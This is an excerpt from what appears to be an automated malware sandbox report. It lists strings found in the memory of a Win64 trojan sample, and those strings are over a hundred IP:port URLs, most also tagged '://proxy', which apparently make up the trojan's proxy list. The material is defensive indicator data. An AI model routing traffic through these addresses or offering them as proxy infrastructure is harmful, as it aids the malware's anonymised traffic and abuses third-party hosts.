                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.17.51.240:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.17.51.240:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.17.51.241:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.17.51.241:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.204.40.155:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.204.40.155:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.207.252.37:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.207.252.37:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.237.248.137:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.237.248.137:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.241.188.138:8111
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.241.188.138:8111://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.241.188.138:8111x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.241.8.234:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.241.8.234:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.254.0.86:32650
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.254.0.86:32650://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.39.112.144:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.39.112.144:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC48B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC1EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.53.247.204:53281
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC1F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.53.247.204:53281://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.117.56.91:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.117.56.91:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C767D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.12.214.148
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.12.214.148://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.133.190.4:8099
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.133.190.4:8099://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.14.8.226:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.14.8.226:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.143.254.38:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.143.254.38:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.172.0.30:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.172.0.30:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.172.60.202:1181
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.172.60.202:1181://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.173.165.36:46330
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.173.165.36:46330://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.187.151.27:30016
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.187.151.27:30016://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.192.40.171:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.192.40.171:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.196.179.34:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.196.179.34:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.107.177
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.107.177://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.107.177:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.118.98
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.118.98://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.118.98:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.244.174:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.244.174:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.249.84:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.249.84:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.94.28:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.94.28:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA61A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA60A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.221.249.213:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA60A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.221.249.213:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.228.43.192:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.228.43.192:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.234.126.107:55555
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.234.126.107:55555://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.235.184.186:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.235.184.186:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.237.51.73:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.237.51.73:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.238.74.91:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.238.74.91:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.26.146.169
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.26.146.169://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.26.146.169:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.26.227.178:47886
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.26.227.178:47886://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C790E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.30.215.48:32946
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.30.215.48:32946://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.30.215.48:60541
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.30.215.48:60541://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.8.68.2
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.8.68.2://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.8.68.2:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.9.87.26:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.9.87.26:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.92.183.97:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.92.183.97:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.95.167.124:11110
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.95.167.124:11110://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.107.178.107:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.107.178.107:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C825A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C81FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.107.178.109:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C825A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.107.178.109:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.107.179.234:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.107.179.234:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.110.27.165:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.110.27.165:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.57.174.152:41455
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.57.174.152:41455://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.57.181.122:51801
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.57.181.122:51801://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.117.11.57:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.117.11.57:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8285000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C82AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.9.10:39625
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C82A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.9.10:39625://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.126.64.193:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.126.64.193:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.126.65.11:1388
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.126.65.11:1388://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA62F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.225.105.108:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA62F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.225.105.108:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.247.251.240:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.247.251.240:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.132.205.84:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.132.205.84:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.135.210.179:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.135.210.179:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.135.41.236:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.135.41.236:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.135.42.126:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.135.42.126:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.150.15.30
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.150.15.30://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.150.15.30:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.198.49.189:4859
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.198.49.189:4859://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.199.164.140:8081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.199.164.140:8081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C63C5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.202.230.103:8896
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.202.230.103:8896://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.211.85.169:42931
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6553000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.211.85.169:42931://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.213.214.254:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.213.214.254:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F92000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.255.102.123:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7FA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.255.102.123:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.255.217.49:10820
